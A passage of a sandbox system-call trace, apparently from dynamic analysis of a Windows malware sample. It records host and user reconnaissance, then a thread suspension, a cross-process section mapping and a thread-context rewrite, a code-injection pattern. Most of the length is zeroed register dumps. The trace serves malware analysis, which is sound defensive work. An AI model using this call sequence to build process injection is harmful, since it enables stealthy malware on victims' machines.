SectionHandle=0x24ea80*=0x90) returned 0x0 [0072.979] NtMapViewOfSection (in: SectionHandle=0x90, ProcessHandle=0xffffffff, BaseAddress=0x24ea84*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e7fc*=0x29a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24ea84*=0x1c0000, SectionOffset=0x0, ViewSize=0x24e7fc*=0x2a000) returned 0x0 [0072.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e7f4*=0x0, ZeroBits=0x0, RegionSize=0x24e7f8*=0x29a00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24e7f4*=0x4d0000, RegionSize=0x24e7f8*=0x2a000) returned 0x0 [0072.983] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="windir", Value=0x24e560 | out: Value="C:\\Windows") returned 0x0 [0072.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\drivers\\etc\\hosts", NtPathName=0x24e528, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0072.983] NtCreateFile (in: FileHandle=0x24e548, DesiredAccess=0x120089, ObjectAttributes=0x24e510*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e530, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e548*=0x8c, IoStatusBlock=0x24e530*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0072.983] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x24e530, FileInformation=0x24e488, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e530, FileInformation=0x24e488) returned 0x0 [0072.983] NtClose (Handle=0x8c) returned 0x0 [0072.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\drivers\\etc\\hosts", NtPathName=0x24e518, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0072.983] NtCreateFile (in: FileHandle=0x24e538, DesiredAccess=0x120089, ObjectAttributes=0x24e500*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e520, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e538*=0x8c, IoStatusBlock=0x24e520*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0072.984] NtQueryInformationFile (in: FileHandle=0x8c, IoStatusBlock=0x24e520, FileInformation=0x24e478, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e520, FileInformation=0x24e478) returned 0x0 [0072.984] NtReadFile (in: FileHandle=0x8c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x24e520, Buffer=0x102958, BufferLength=0x338, ByteOffset=0x24e490*=0, Key=0x0 | out: IoStatusBlock=0x24e520, Buffer=0x102958*) returned 0x0 [0072.984] NtClose (Handle=0x8c) returned 0x0 [0072.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x1f0000, RegionSize=0x24e818*=0x10000) returned 0x0 [0072.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1f0000, ResultLength=0x0) returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x24debc | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e228 | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0073.001] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x24e240 | out: Value="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x0 [0073.001] NtCreateSection (in: SectionHandle=0x24f870, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e278, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24f870*=0x8c) returned 0x0 [0073.001] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x24f86c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e278*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24f86c*=0x1b00000, SectionOffset=0x0, ViewSize=0x24e278*=0x9c4000) returned 0x0 [0073.001] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x24d9e0 | out: TokenHandle=0x24d9e0*=0x98) returned 0x0 [0073.004] NtQueryInformationToken (in: TokenHandle=0x98, TokenInformationClass=0x1, TokenInformation=0x24d1d8, TokenInformationLength=0x400, ReturnLength=0x24d9d8 | out: TokenInformation=0x24d1d8, ReturnLength=0x24d9d8) returned 0x0 [0073.005] ConvertSidToStringSidW () returned 0x1 [0073.005] NtClose (Handle=0x98) returned 0x0 [0073.012] RtlIntegerToChar (in: Value=0x8ef355b7, Base=0x10, Length=0x20, String=0x1b06481 | out: String="8EF355B7") returned 0x0 [0073.014] NtCreateKey (in: KeyHandle=0x24e4c0, DesiredAccess=0x20219, ObjectAttributes=0x24d9e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e4c0*=0x98) returned 0x0 [0073.017] NtQueryValueKey (in: KeyHandle=0x98, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0x24e02c, Length=0x100, ResultLength=0x24e4a4 | out: KeyValueInformation=0x24e02c*(TitleIndex=0x0, Type=0x1, DataOffset=0x2c, DataLength=0x2e, NameLength=0x16, Name="ProductName", Data="Windows 7 Professional"), ResultLength=0x24e4a4) returned 0x0 [0073.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24da10*=0x0, ZeroBits=0x0, RegionSize=0x24da14*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24da10*=0x9d0000, RegionSize=0x24da14*=0x1f5000) returned 0x0 [0073.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24d9fc*=0x0, ZeroBits=0x0, RegionSize=0x24da00*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x24d9fc*=0xbd0000, RegionSize=0x24da00*=0x1f5000) returned 0x0 [0073.018] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x24da00 | out: Value="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x0 [0073.018] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x24d9c8 | out: Value="C:\\Program Files") returned 0x0 [0073.023] NtOpenProcess (in: ProcessHandle=0x24e824, DesiredAccess=0x438, ObjectAttributes=0x24e7ec*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x24e804*(UniqueProcess=0x610, UniqueThread=0x0) | out: ProcessHandle=0x24e824*=0x9c) returned 0x0 [0073.023] NtQueryInformationProcess (in: ProcessHandle=0x9c, ProcessInformationClass=0x0, ProcessInformation=0x24e498, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x24e498, ReturnLength=0x0) returned 0x0 [0073.026] NtReadVirtualMemory (in: ProcessHandle=0x9c, BaseAddress=0x7ffde000, Buffer=0x24e7ac, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x24e7ac*, NumberOfBytesRead=0x0) returned 0x0 [0073.028] NtDelayExecution (Alertable=0, Interval=0x24e480*=-50000000) returned 0x0 [0078.539] NtOpenThread (in: ThreadHandle=0x24e818, DesiredAccess=0x1a, ObjectAttributes=0x24e464, ClientId=0x24e47c*(UniqueProcess=0x0, UniqueThread=0x614) | out: ThreadHandle=0x24e818*=0xa0) returned 0x0 [0078.544] NtSuspendThread (in: ThreadHandle=0xa0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0078.544] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x9c, BaseAddress=0x24e4b8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e4b4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x24e4b8*=0x6840000, SectionOffset=0x0, ViewSize=0x24e4b4*=0x9c4000) returned 0x0 [0078.546] NtGetContextThread (in: ThreadHandle=0xa0, Context=0x24e4e0 | out: Context=0x24e4e0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x1af1d8, Ecx=0xdd, Eax=0xe1cd86d3, Ebp=0x1afaac, Eip=0x76f970b4, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0078.546] NtCreateSection (in: SectionHandle=0x24e4a0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x24e460, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x24e4a0*=0xa4) returned 0x0 [0078.546] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x24e4a8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e460*=0x196a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e4a8*=0x24d0000, SectionOffset=0x0, ViewSize=0x24e460*=0x197000) returned 0x0 [0078.546] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0x9c, BaseAddress=0x24e4a4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x24e49c*=0x196a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x24e4a4*=0x63a0000, SectionOffset=0x0, ViewSize=0x24e49c*=0x197000) returned 0x0 [0078.569] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x24d0000) returned 0x0 [0078.584] NtClose (Handle=0xa4) returned 0x0 [0078.588] NtSetContextThread (ThreadHandle=0xa0, Context=0x24e4e0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x1af1d8, Ecx=0xdd, Eax=0xe1cd86d3, Ebp=0x1afaac, Eip=0x64a4b87, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, 